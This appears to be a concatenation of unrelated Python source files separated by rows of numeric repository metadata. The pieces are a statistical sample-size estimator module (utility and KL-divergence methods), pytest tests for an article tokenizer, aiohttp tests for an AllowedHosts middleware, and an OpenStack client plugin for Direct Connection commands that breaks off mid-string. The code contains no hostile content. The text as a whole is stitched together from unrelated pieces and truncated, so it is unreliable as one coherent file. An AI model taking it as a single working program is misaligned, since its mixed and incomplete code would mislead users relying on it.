        if self.averaging <= 0:
            raise ValueError(
                "The averaging should be positive but get {}".format(
                    self.averaging))
        self.c = kwards.pop('c', 0.005)
        if self.c <= 0:
            raise ValueError(
                "The c must be positive value but get {}".format(
                    self.c))
        self.begin = kwards.pop('begin', None)
        if self.begin is not None and self.begin < 0:
            raise ValueError(
                "The begin must be positive value but get {}".format(
                    self.begin))
        self.end = kwards.pop('end', None)
        if self.end is not None and self.end < 0:
            raise ValueError(
                "The end must be positive value but get {}".format(
                    self.end))
        if self.end is not None and self.begin is not None \
                and self.end <= self.begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    self.end, self.begin))
        self.num = kwards.pop('num', 5)
        if self.num <= 0:
            raise ValueError(
                "The num must be positive value but get {}".format(
                    self.num))
        if self.end is not None and self.begin is not None \
                and self.num >= self.end - self.begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, self.end - self.begin))
        self.multiprocess = kwards.pop('multiprocess', False)
        if not isinstance(self.multiprocess, bool):
            raise ValueError(
                "The multiprocess must be bool value but get {}".format(
                    self.multiprocess))
        self.progressbar = kwards.pop('progressbar', False)
        if not isinstance(self.progressbar, bool):
            raise ValueError(
                "The progressbar must be bool value but get {}".format(
                    self.progressbar))
        # Anything left in kwards is an unsupported keyword argument.
        if kwards:
            raise ValueError("Invalid parameters: %s" % str(kwards))
        self.dataset = None

    def _uFunction(self, dataset):
        r"""
        Monte-Carlo utility of one dataset: the averaged per-sample log
        joint under 100 Laplace-posterior draws, minus the acquisition
        cost ``c * len(y)``.
        """
        X, y = dataset.sample()
        model = self.statmodel(y, X)
        w_hat = model.fit()
        # Small ridge (0.01 * I) keeps the matrix invertible.
        cov = np.linalg.inv(
            0.01*np.eye(w_hat.shape[0]) - model.hessian(w_hat))
        prior = sps.multivariate_normal(
            mean=np.zeros(w_hat.shape[0]), cov=0.01*np.eye(w_hat.shape[0]))
        W = sps.multivariate_normal(mean=w_hat, cov=cov).rvs(size=100)
        u = [model.loglike(w) + prior.logpdf(w) for w in W]
        return np.mean(u)/y.shape[0] - self.c*y.shape[0]

    def _score_subsample(self, m):
        r"""
        Draw one random subsample of size ``m`` and score it with
        :meth:`_uFunction`.
        """
        X_m, y_m = self.dataset.sample(m)
        return self._uFunction(Dataset(X_m, y_m))

    def forward(self, features, target):
        r"""
        Returns sample size prediction for the given dataset.

        :param features: The tensor of shape
            `num_elements` :math:`\times` `num_feature`.
        :type features: array.
        :param target: The tensor of shape `num_elements`.
        :type target: array.
        :return: dict with keys ``'m*'`` (utility-maximizing sample size),
            ``'E'`` and ``'S'`` (mean/std of the utilities per subset size)
            and ``'m'`` (the grid of subset sizes).
        :rtype: dict
        """
        self.dataset = Dataset(features, target)
        # Resolve the search range, falling back to data-driven defaults.
        end = len(self.dataset) - 1 if self.end is None else self.end
        begin = 2*self.dataset.n if self.begin is None else self.begin
        if end <= begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    end, begin))
        if self.num >= end - begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, end - begin))
        subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
        points_one = np.ones(self.averaging, dtype=np.int64)
        pool = Pool() if self.multiprocess else None
        mapping = map if pool is None else pool.map
        iterator = (self._progressbar(subset_sizes)
                    if self.progressbar else subset_sizes)
        list_of_answers = []
        try:
            for i, m in enumerate(iterator):
                list_of_answers.append(
                    np.asarray(
                        list(mapping(self._score_subsample, m*points_one))))
                self._set_status(100.*(i+1)/len(subset_sizes))
        finally:
            # BUG FIX: release the worker processes even if scoring raises;
            # previously an exception leaked the pool.
            if pool is not None:
                pool.close()
                pool.join()
        list_of_answers = np.asarray(list_of_answers)
        list_of_E = np.mean(list_of_answers, axis=1)
        list_of_S = np.std(list_of_answers, axis=1)
        return {'m*': subset_sizes[np.argmax(np.array(list_of_E))],
                'E': np.array(list_of_E),
                'S': np.array(list_of_S),
                'm': np.array(subset_sizes),
                }
class KLEstimator(SampleSizeEstimator):
    r"""
    Kullback-Leibler based method for sample size estimation.

    For a grid of subset sizes the averaged leave-one-out KL divergence
    between Laplace posteriors (with and without a single observation) is
    computed; the smallest size for which it drops below ``epsilon`` is
    returned.

    :param statmodel: the machine learning algorithm
    :type statmodel: RegressionModel or LogisticModel
    :param averaging: number of subsamples scored per subset size
    :type averaging: int
    :param epsilon: posterior-stability threshold on the averaged KL
    :type epsilon: float
    :param begin: smallest subset size (default ``2 * num_features``)
    :type begin: int
    :param end: largest subset size (default ``len(dataset) - 1``)
    :type end: int
    :param num: step between consecutive subset sizes
    :type num: int
    :param multiprocess: score subsamples in a multiprocessing pool
    :type multiprocess: bool
    :param progressbar: display progress while scoring
    :type progressbar: bool
    """
    def __init__(self, statmodel, **kwards):
        r"""Constructor method
        """
        super().__init__()
        self.statmodel = statmodel
        self.averaging = int(kwards.pop('averaging', 5))
        if self.averaging <= 0:
            raise ValueError(
                "The averaging should be positive but get {}".format(
                    self.averaging))
        self.epsilon = kwards.pop('epsilon', 0.01)
        if self.epsilon <= 0:
            raise ValueError(
                "The epsilon must be positive value but get {}".format(
                    self.epsilon))
        self.begin = kwards.pop('begin', None)
        if self.begin is not None and self.begin < 0:
            raise ValueError(
                "The begin must be positive value but get {}".format(
                    self.begin))
        self.end = kwards.pop('end', None)
        if self.end is not None and self.end < 0:
            raise ValueError(
                "The end must be positive value but get {}".format(
                    self.end))
        if self.end is not None and self.begin is not None \
                and self.end <= self.begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    self.end, self.begin))
        self.num = kwards.pop('num', 5)
        if self.num <= 0:
            raise ValueError(
                "The num must be positive value but get {}".format(
                    self.num))
        if self.end is not None and self.begin is not None \
                and self.num >= self.end - self.begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, self.end - self.begin))
        self.multiprocess = kwards.pop('multiprocess', False)
        if not isinstance(self.multiprocess, bool):
            raise ValueError(
                "The multiprocess must be bool value but get {}".format(
                    self.multiprocess))
        self.progressbar = kwards.pop('progressbar', False)
        if not isinstance(self.progressbar, bool):
            raise ValueError(
                "The progressbar must be bool value but get {}".format(
                    self.progressbar))
        # Anything left in kwards is an unsupported keyword argument.
        if kwards:
            raise ValueError("Invalid parameters: %s" % str(kwards))
        self.dataset = None

    @staticmethod
    def D_KL_normal(m_0, cov_0, m_1, cov_1, cov_0_inv, cov_1_inv):
        r"""
        Closed-form KL divergence ``KL(N(m_1, cov_1) || N(m_0, cov_0))``.

        ``cov_1_inv`` is kept in the signature for backward compatibility
        although the closed form does not need it.
        """
        m_0 = np.array(m_0, ndmin=1)
        m_1 = np.array(m_1, ndmin=1)
        cov_0 = np.array(cov_0, ndmin=2)
        cov_1 = np.array(cov_1, ndmin=2)
        diff = np.reshape(m_1 - m_0, [-1, 1])
        D_KL_1 = np.sum(np.diagonal(cov_1@cov_0_inv))
        # BUG FIX: the quadratic term of the Gaussian KL uses the precision
        # matrix of the reference distribution (cov_0_inv); the original
        # code used the covariance cov_1 here, which is not the KL formula.
        D_KL_2 = float(diff.T@cov_0_inv@diff)
        D_KL_3 = -m_0.shape[0]
        # slogdet avoids overflow/underflow of det() in higher dimensions.
        D_KL_4 = float(
            np.linalg.slogdet(cov_0)[1] - np.linalg.slogdet(cov_1)[1])
        return 0.5*(D_KL_1 + D_KL_2 + D_KL_3 + D_KL_4)

    def _klFunction(self, dataset):
        r"""
        Average leave-one-out KL divergence between the Laplace posterior
        on the full sample and the posteriors with one observation removed.

        NOTE: the model is refitted once per observation, so the cost is
        linear in the subsample size.
        """
        X, y = dataset.sample()
        model_0 = self.statmodel(y, X)
        m_0 = model_0.fit()
        # Regularized precision/covariance of the full-sample posterior.
        cov_0_inv = 0.01*np.eye(m_0.shape[0]) - model_0.hessian(m_0)
        cov_0 = np.linalg.inv(cov_0_inv)
        indexes = np.random.permutation(X.shape[0])
        list_of_res = []
        for ind in indexes:
            X_new = np.delete(X, ind, axis=0)
            y_new = np.delete(y, ind, axis=0)
            model_1 = self.statmodel(y_new, X_new)
            m_1 = model_1.fit()
            cov_1_inv = 0.01*np.eye(m_1.shape[0]) - model_1.hessian(m_1)
            cov_1 = np.linalg.inv(cov_1_inv)
            list_of_res.append(
                self.D_KL_normal(m_0, cov_0, m_1, cov_1, cov_0_inv, cov_1_inv))
        return np.mean(list_of_res)

    def _score_subsample(self, m):
        r"""
        Draw one random subsample of size ``m`` and score it with
        :meth:`_klFunction`.
        """
        X_m, y_m = self.dataset.sample(m)
        return self._klFunction(Dataset(X_m, y_m))

    def forward(self, features, target):
        r"""
        Returns sample size prediction for the given dataset.

        :param features: The tensor of shape
            `num_elements` :math:`\times` `num_feature`.
        :type features: array.
        :param target: The tensor of shape `num_elements`.
        :type target: array.
        :return: dict with keys ``'m*'`` (estimated sample size), ``'E'``
            and ``'S'`` (mean/std of the KL scores per subset size) and
            ``'m'`` (the grid of subset sizes).
        :rtype: dict
        """
        self.dataset = Dataset(features, target)
        # Resolve the search range, falling back to data-driven defaults.
        end = len(self.dataset) - 1 if self.end is None else self.end
        begin = 2*self.dataset.n if self.begin is None else self.begin
        if end <= begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    end, begin))
        if self.num >= end - begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, end - begin))
        subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
        points_one = np.ones(self.averaging, dtype=np.int64)
        pool = Pool() if self.multiprocess else None
        mapping = map if pool is None else pool.map
        iterator = (self._progressbar(subset_sizes)
                    if self.progressbar else subset_sizes)
        list_of_answers = []
        try:
            for i, m in enumerate(iterator):
                list_of_answers.append(
                    np.asarray(
                        list(mapping(self._score_subsample, m*points_one))))
                self._set_status(100.*(i+1)/len(subset_sizes))
        finally:
            # BUG FIX: release the worker processes even if scoring raises;
            # previously an exception leaked the pool.
            if pool is not None:
                pool.close()
                pool.join()
        list_of_answers = np.asarray(list_of_answers)
        list_of_E = np.mean(list_of_answers, axis=1)
        list_of_S = np.std(list_of_answers, axis=1)
        # Smallest subset size whose averaged KL is already below `epsilon`;
        # fall back to `end` when no size qualifies.
        m_size = end
        for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
            if mean < self.epsilon:
                m_size = m
        return {'m*': m_size,
                'E': np.array(list_of_E),
                'S': np.array(list_of_S),
                'm': np.array(subset_sizes),
                }
| 32.193159
| 107
| 0.545344
| 3,934
| 32,000
| 4.331469
| 0.057448
| 0.023592
| 0.060211
| 0.034742
| 0.892782
| 0.88885
| 0.887441
| 0.887441
| 0.880575
| 0.876115
| 0
| 0.012586
| 0.346969
| 32,000
| 993
| 108
| 32.225579
| 0.802843
| 0.136938
| 0
| 0.830918
| 0
| 0
| 0.121208
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033816
| false
| 0
| 0.011272
| 0
| 0.078905
| 0.00161
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ef528c9478486c938c78de9dcdd098425597183
| 3,147
|
py
|
Python
|
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-01-04T11:58:36.000Z
|
2022-01-04T11:58:36.000Z
|
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | null | null | null |
tests/test_tokenize.py
|
BeTKH/articlenizer
|
7f18a630c71fcb7c80c710b9ef3870e460f49cac
|
[
"MIT"
] | 1
|
2022-02-15T17:09:37.000Z
|
2022-02-15T17:09:37.000Z
|
import pytest
from articlenizer import articlenizer
def test_tokenization_with_spaces():
    """With representation='spaces' the tokenizer must also emit the
    whitespace between word tokens as ' ' tokens (round-trippable output)."""
    s = 'Tokenization is tested with a single sentence, which requires an example such as the sentence: "Data processing and statistical analyses were conducted using IBM SPSS 22.0 (IBM Corp., Armonk, NY), MATLAB R2015a (The MathWorks, Natick, MA), R 3.3.2 R2.11.1 (http://www.R-project.org/), and Python libraries for scientific computation (NumPy, and SciPy) [39]."'
    s = articlenizer.tokenize_text(s, representation='spaces')
    assert s == ['Tokenization', ' ', 'is', ' ', 'tested', ' ', 'with', ' ', 'a', ' ', 'single', ' ', 'sentence', ',', ' ', 'which', ' ', 'requires', ' ', 'an', ' ', 'example', ' ', 'such', ' ', 'as', ' ', 'the', ' ', 'sentence', ':', ' ', '"', 'Data', ' ', 'processing', ' ', 'and', ' ', 'statistical', ' ', 'analyses', ' ', 'were', ' ', 'conducted', ' ', 'using', ' ', 'IBM', ' ', 'SPSS', ' ', '22.0', ' ', '(', 'IBM', ' ', 'Corp', '.', ',', ' ', 'Armonk', ',', ' ', 'NY', ')', ',', ' ', 'MATLAB', ' ', 'R', '2015a', ' ', '(', 'The', ' ', 'MathWorks', ',', ' ', 'Natick', ',', ' ', 'MA', ')', ',', ' ', 'R', ' ', '3.3.2', ' ', 'R', '2.11.1', ' ', '(', 'http://www.R-project.org/', ')', ',', ' ', 'and', ' ', 'Python', ' ', 'libraries', ' ', 'for', ' ', 'scientific', ' ', 'computation', ' ', '(', 'NumPy', ',', ' ', 'and', ' ', 'SciPy', ')', ' ', '[39]', '.', '"']
def test_tokenization_without_spaces():
    """Default tokenization: same sentence as above (minus the duplicated
    R version) must yield only word/punctuation tokens, no whitespace."""
    s = 'Tokenization is tested with a single sentence, which requires an example such as the sentence: "Data processing and statistical analyses were conducted using IBM SPSS 22.0 (IBM Corp., Armonk, NY), MATLAB R2015a (The MathWorks, Natick, MA), R 3.3.2 (http://www.R-project.org/), and Python libraries for scientific computation (NumPy, and SciPy) [39]."'
    s = articlenizer.tokenize_text(s)
    assert s == ['Tokenization', 'is', 'tested', 'with', 'a', 'single', 'sentence', ',', 'which', 'requires', 'an', 'example', 'such', 'as', 'the', 'sentence', ':', '"', 'Data', 'processing', 'and', 'statistical', 'analyses', 'were', 'conducted', 'using', 'IBM', 'SPSS', '22.0', '(', 'IBM', 'Corp', '.', ',', 'Armonk', ',', 'NY', ')', ',', 'MATLAB', 'R', '2015a', '(', 'The', 'MathWorks', ',', 'Natick', ',', 'MA', ')', ',', 'R', '3.3.2', '(', 'http://www.R-project.org/', ')', ',', 'and', 'Python', 'libraries', 'for', 'scientific', 'computation', '(', 'NumPy', ',', 'and', 'SciPy', ')', '[39]', '.', '"']
def test_tokenization_without_spaces_application():
    """URLs with query-like parts (package=...) must stay single tokens."""
    s = "Several softwares and R packages are available for Rasch model analysis such as ConQuest (https://shop.acer.edu.au/group/CON3), RUMM (www.rummlab.com.au), ltm (cran.r-project.org/package=ltm) and eRM (cran.r-project.org/package=eRm)."
    s = articlenizer.tokenize_text(s)
    # Leftover debug print(s) removed; pytest shows the value on failure.
    assert s == ['Several', 'softwares', 'and', 'R', 'packages', 'are', 'available', 'for', 'Rasch', 'model', 'analysis', 'such', 'as', 'ConQuest', '(', 'https://shop.acer.edu.au/group/CON3', ')', ',', 'RUMM', '(', 'www.rummlab.com.au', ')', ',', 'ltm', '(', 'cran.r-project.org/package=ltm', ')', 'and', 'eRM', '(', 'cran.r-project.org/package=eRm', ')', '.']
| 157.35
| 866
| 0.550683
| 365
| 3,147
| 4.712329
| 0.249315
| 0.037209
| 0.051163
| 0.048837
| 0.932558
| 0.917442
| 0.917442
| 0.917442
| 0.917442
| 0.917442
| 0
| 0.021755
| 0.152844
| 3,147
| 19
| 867
| 165.631579
| 0.623406
| 0
| 0
| 0.133333
| 0
| 0.2
| 0.578011
| 0.046393
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0
| 0.133333
| 0
| 0.333333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
487f831c1832c68c006340c5d8bf28c5389fcbb2
| 1,538
|
py
|
Python
|
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | 1
|
2019-08-20T17:18:39.000Z
|
2019-08-20T17:18:39.000Z
|
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | null | null | null |
tests/test_allowed_hosts.py
|
rgacote/aiohttp-remotes
|
8b28757bc10ed7878e1bbc0539dcfb3b37cb5e96
|
[
"MIT"
] | null | null | null |
from aiohttp import web
from aiohttp_remotes import AllowedHosts
from aiohttp_remotes import setup as _setup
async def test_allowed_hosts_ok(aiohttp_client):
    """A request whose Host header is whitelisted is served normally."""
    async def handler(request):
        return web.Response()

    application = web.Application()
    application.router.add_get('/', handler)
    await _setup(application, AllowedHosts({'example.com'}))
    client = await aiohttp_client(application)
    response = await client.get('/', headers={'Host': 'example.com'})
    assert response.status == 200
async def test_allowed_hosts_forbidden(aiohttp_client):
    """A request with a non-whitelisted Host header is rejected with 400."""
    async def handler(request):
        return web.Response()

    application = web.Application()
    application.router.add_get('/', handler)
    await _setup(application, AllowedHosts({'example.com'}))
    client = await aiohttp_client(application)
    response = await client.get('/', headers={'Host': 'not-allowed.com'})
    assert response.status == 400
async def test_allowed_hosts_star(aiohttp_client):
    """The '*' wildcard whitelist accepts any Host header."""
    async def handler(request):
        return web.Response()

    application = web.Application()
    application.router.add_get('/', handler)
    await _setup(application, AllowedHosts({'*'}))
    client = await aiohttp_client(application)
    response = await client.get('/', headers={'Host': 'example.com'})
    assert response.status == 200
async def test_allowed_hosts_default(aiohttp_client):
    """AllowedHosts() with no explicit whitelist serves the request."""
    async def handler(request):
        return web.Response()

    application = web.Application()
    application.router.add_get('/', handler)
    await _setup(application, AllowedHosts())
    client = await aiohttp_client(application)
    response = await client.get('/', headers={'Host': 'example.com'})
    assert response.status == 200
| 29.576923
| 65
| 0.673602
| 197
| 1,538
| 5.101523
| 0.19797
| 0.063682
| 0.047761
| 0.075622
| 0.854726
| 0.806965
| 0.806965
| 0.806965
| 0.806965
| 0.806965
| 0
| 0.009615
| 0.188557
| 1,538
| 51
| 66
| 30.156863
| 0.795673
| 0
| 0
| 0.717949
| 0
| 0
| 0.061769
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.179487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f88f1d945642bae59cbcabf2385aecc3ce8242a
| 15,990
|
py
|
Python
|
otcextensions/osclient/dcaas/v2/connection.py
|
gtema/python-otcextensions
|
e92dff75df4f59594a88dbb090f14990f4d6c729
|
[
"Apache-2.0"
] | 10
|
2018-03-03T17:59:59.000Z
|
2020-01-08T10:03:00.000Z
|
otcextensions/osclient/dcaas/v2/connection.py
|
OpenTelekomCloud/python-otcextensions
|
12f20b88a00d69160f6e4c69132a3cec6d5f7db1
|
[
"Apache-2.0"
] | 39
|
2018-03-26T14:43:23.000Z
|
2020-02-07T16:42:53.000Z
|
otcextensions/osclient/dcaas/v2/connection.py
|
gtema/python-otcextensions
|
e92dff75df4f59594a88dbb090f14990f4d6c729
|
[
"Apache-2.0"
] | 9
|
2018-03-27T09:17:40.000Z
|
2019-08-07T12:53:49.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Direct Connection v2 action implementations"""
import logging
from osc_lib import utils
from osc_lib.command import command
from otcextensions.i18n import _
from otcextensions.common import sdk_utils
LOG = logging.getLogger(__name__)
def _get_columns(item):
    # Connections need no SDK-attribute renaming, so the map stays empty.
    return sdk_utils.get_osc_show_columns_for_sdk_resource(item, {})
class ListDirectConnections(command.Lister):
    _description = _("List of Direct Connections.")

    # Columns shown in the listing output.
    columns = (
        'id',
        'name',
        'port type',
        'provider',
        'bandwidth',
        'location',
        'status'
    )

    def get_parser(self, prog_name):
        """Build the argument parser with every supported list filter."""
        parser = super(ListDirectConnections, self).get_parser(prog_name)
        parser.add_argument(
            '--id',
            metavar='<id>',
            help=_("Specifies the ID of the Direct Connection.")
        )
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_("Specified the name of Direct Connection.")
        )
        parser.add_argument(
            '--port_type',
            metavar='<port_type>',
            help=_("Specified the port type of Direct Connection. The value "
                   "can be 1G or 10G.")
        )
        parser.add_argument(
            '--bandwidth',
            metavar='<bandwidth>',
            type=int,
            help=_("Specified the bandwidth of Direct Connection in Mbit/s.")
        )
        parser.add_argument(
            '--location',
            metavar='<location>',
            help=_("Specified the access location of Direct Connection.")
        )
        parser.add_argument(
            '--peer_location',
            metavar='<peer_location>',
            help=_("Specifies the location of the on-premises facility at "
                   "the other end of the connection, specific to the street "
                   "or data center name.")
        )
        parser.add_argument(
            '--device_id',
            metavar='<device_id>',
            help=_("Specifies the gateway device ID of the Direct Connection.")
        )
        parser.add_argument(
            '--interface_name',
            metavar='<interface_name>',
            help=_("Specifies the name of the interface accessed by the "
                   "Direct Connection.")
        )
        parser.add_argument(
            '--redundant_id',
            metavar='<redundant_id>',
            help=_("Specifies the ID of the redundant connection using "
                   "the same gateway.")
        )
        parser.add_argument(
            '--provider',
            metavar='<provider>',
            help=_("Specifies the carrier who provides the leased line.")
        )
        parser.add_argument(
            '--provider_status',
            metavar='<provider_status>',
            help=_("Specifies the status of the carrier's leased line."
                   " The value can be ACTIVE or DOWN.")
        )
        parser.add_argument(
            '--type',
            metavar='<type>',
            help=_("Specifies the connection type. The value can be hosted.")
        )
        parser.add_argument(
            '--hosting_id',
            metavar='<hosting_id>',
            help=_("Specifies the ID of the operations connection on which"
                   " the hosted connection is created.")
        )
        parser.add_argument(
            '--vlan',
            metavar='<vlan>',
            help=_("Specifies the VLAN pre-allocated to the hosted"
                   " connection.")
        )
        parser.add_argument(
            '--charge_mode',
            metavar='<charge_mode>',
            help=_("Specifies the billing mode. The value can be prepayment,"
                   " bandwidth, or traffic.")
        )
        parser.add_argument(
            '--apply_time',
            metavar='<apply_time>',
            help=_("Specifies the time when the connection is requested.")
        )
        parser.add_argument(
            '--create_time',
            metavar='<create_time>',
            help=_("Specifies the time when the connection is created.")
        )
        parser.add_argument(
            '--delete_time',
            metavar='<delete_time>',
            help=_("Specifies the time when the connection is deleted.")
        )
        parser.add_argument(
            '--order_id',
            metavar='<order_id>',
            help=_("Specifies the order number of the connection.")
        )
        parser.add_argument(
            '--product_id',
            metavar='<product_id>',
            help=_("Specifies the product ID corresponding to the "
                   "connection's order.")
        )
        parser.add_argument(
            '--status',
            metavar='<status>',
            help=_("Specifies the connection status. The value can be ACTIVE, "
                   "DOWN, BUILD, ERROR, PENDING_DELETE, DELETED, APPLY, DENY, "
                   "PENDING_PAY, PAID, ORDERING, ACCEPT, or REJECTED.")
        )
        parser.add_argument(
            '--admin_state_up',
            metavar='<admin_state_up>',
            help=_("Specifies the administrative status of the connection."
                   "The value can be true or false.")
        )
        return parser

    def take_action(self, parsed_args):
        """Query connections matching the supplied filters and build rows."""
        client = self.app.client_manager.dcaas
        args_list = [
            'id',
            'name',
            'port_type',
            'bandwidth',
            'location',
            'peer_location',
            'device_id',
            'interface_name',
            'redundant_id',
            'provider',
            'provider_status',
            'type',
            'hosting_id',
            'vlan',
            'charge_mode',
            'apply_time',
            'create_time',
            'delete_time',
            'order_id',
            'product_id',
            'status',
            'admin_state_up'
        ]
        attrs = {}
        for arg in args_list:
            val = getattr(parsed_args, arg)
            # BUG FIX: `is not None` instead of truthiness, so explicitly
            # falsy filters (e.g. --bandwidth 0) are not silently dropped.
            if val is not None:
                attrs[arg] = val
        data = client.connections(**attrs)
        table = (self.columns, (utils.get_dict_properties(s, self.columns)
                                for s in data))
        return table
class ShowDirectConnection(command.ShowOne):
    _description = _("Show Direct Connection details.")

    def get_parser(self, prog_name):
        """Add the single positional argument identifying the connection."""
        parser = super(ShowDirectConnection, self).get_parser(prog_name)
        parser.add_argument(
            'direct_connection',
            metavar='<direct_connection>',
            help=_("Specifies the connection ID or name.")
        )
        return parser

    def take_action(self, parsed_args):
        """Look up the connection and return its displayable properties."""
        client = self.app.client_manager.dcaas
        connection = client.find_connection(parsed_args.direct_connection)
        display_columns, columns = _get_columns(connection)
        data = utils.get_item_properties(connection, columns)
        return (display_columns, data)
class CreateDirectConnection(command.ShowOne):
    _description = _("Create new Direct Connection")

    def get_parser(self, prog_name):
        """Build the argument parser for connection creation."""
        parser = super(CreateDirectConnection, self).get_parser(prog_name)
        parser.add_argument(
            'port_type',
            metavar='<port_type>',
            help=_("Specified the port type of Direct Connection. The value "
                   "can be 1G or 10G.")
        )
        parser.add_argument(
            'bandwidth',
            metavar='<bandwidth>',
            type=int,
            help=_("Specified the bandwidth of Direct Connection in Mbit/s.")
        )
        parser.add_argument(
            'location',
            metavar='<location>',
            help=_("Specified the access location of Direct Connection.")
        )
        parser.add_argument(
            'provider',
            metavar='<provider>',
            help=_("Specifies the carrier who provides the leased line.")
        )
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_("Specified the name of Direct Connection.")
        )
        parser.add_argument(
            '--description',
            metavar='<description>',
            help=_("Provides supplementary information about the connection.")
        )
        parser.add_argument(
            '--peer_location',
            metavar='<peer_location>',
            help=_("Specifies the location of the on-premises facility at "
                   "the other end of the connection, specific to the street "
                   "or data center name.")
        )
        parser.add_argument(
            '--device_id',
            metavar='<device_id>',
            help=_("Specifies the gateway device ID of the Direct Connection.")
        )
        parser.add_argument(
            '--interface_name',
            metavar='<interface_name>',
            help=_("Specifies the name of the interface accessed by the "
                   "Direct Connection.")
        )
        parser.add_argument(
            '--redundant_id',
            metavar='<redundant_id>',
            help=_("Specifies the ID of the redundant connection using "
                   "the same gateway.")
        )
        parser.add_argument(
            '--provider_status',
            metavar='<provider_status>',
            help=_("Specifies the status of the carrier's leased line. "
                   "The value can be ACTIVE or DOWN.")
        )
        parser.add_argument(
            '--type',
            metavar='<type>',
            help=_("Specifies the connection type. The value can be hosted.")
        )
        parser.add_argument(
            '--hosting_id',
            metavar='<hosting_id>',
            help=_("Specifies the ID of the operations connection on which "
                   "the hosted connection is created.")
        )
        parser.add_argument(
            '--vlan',
            metavar='<vlan>',
            type=int,
            help=_("Specifies the VLAN pre-allocated to the hosted "
                   "connection.")
        )
        parser.add_argument(
            '--charge_mode',
            metavar='<charge_mode>',
            help=_("Specifies the billing mode. The value can be prepayment, "
                   "bandwidth, or traffic.")
        )
        parser.add_argument(
            '--order_id',
            metavar='<order_id>',
            help=_("Specifies the order number of the connection.")
        )
        parser.add_argument(
            '--product_id',
            metavar='<product_id>',
            help=_("Specifies the product ID corresponding to the "
                   "connection's order.")
        )
        parser.add_argument(
            '--status',
            metavar='<status>',
            help=_("Specifies the connection status. The value can be ACTIVE, "
                   "DOWN, BUILD, ERROR, PENDING_DELETE, DELETED, APPLY, DENY, "
                   "PENDING_PAY, PAID, ORDERING, ACCEPT, or REJECTED.")
        )
        # NOTE(review): argparse's type=bool converts any non-empty string
        # (including "false") to True — consider a str-to-bool converter.
        parser.add_argument(
            '--admin_state_up',
            metavar='<admin_state_up>',
            type=bool,
            help=_("Specifies the administrative status of the connection. "
                   "The value can be true or false.")
        )
        return parser

    def take_action(self, parsed_args):
        """Create the connection from the supplied attributes."""
        client = self.app.client_manager.dcaas
        args_list = [
            'name',
            'description',
            'port_type',
            'bandwidth',
            'location',
            'peer_location',
            'device_id',
            'interface_name',
            'redundant_id',
            'provider',
            'provider_status',
            'type',
            'hosting_id',
            'vlan',
            'charge_mode',
            'order_id',
            'product_id',
            'status',
            'admin_state_up'
        ]
        attrs = {}
        for arg in args_list:
            val = getattr(parsed_args, arg)
            # BUG FIX: `is not None` instead of truthiness, so explicitly
            # falsy values (e.g. --vlan 0) are not silently dropped.
            if val is not None:
                attrs[arg] = val
        obj = client.create_connection(**attrs)
        display_columns, columns = _get_columns(obj)
        data = utils.get_item_properties(obj, columns)
        return (display_columns, data)
class UpdateDirectConnection(command.ShowOne):
    """Command that updates the mutable attributes of a Direct Connection."""

    _description = _("Update a Direct Connection")

    def get_parser(self, prog_name):
        """Build the argument parser for the update command."""
        parser = super(UpdateDirectConnection, self).get_parser(prog_name)
        parser.add_argument(
            'direct_connection',
            metavar='<direct_connection>',
            help=_("Specifies the connection ID or name.")
        )
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_("Specifies the connection name.")
        )
        parser.add_argument(
            '--description',
            metavar='<description>',
            help=_("Provides supplementary information about the connection.")
        )
        parser.add_argument(
            '--bandwidth',
            metavar='<bandwidth>',
            type=int,
            help=_("Specifies the bandwidth of the connection in Mbit/s. "
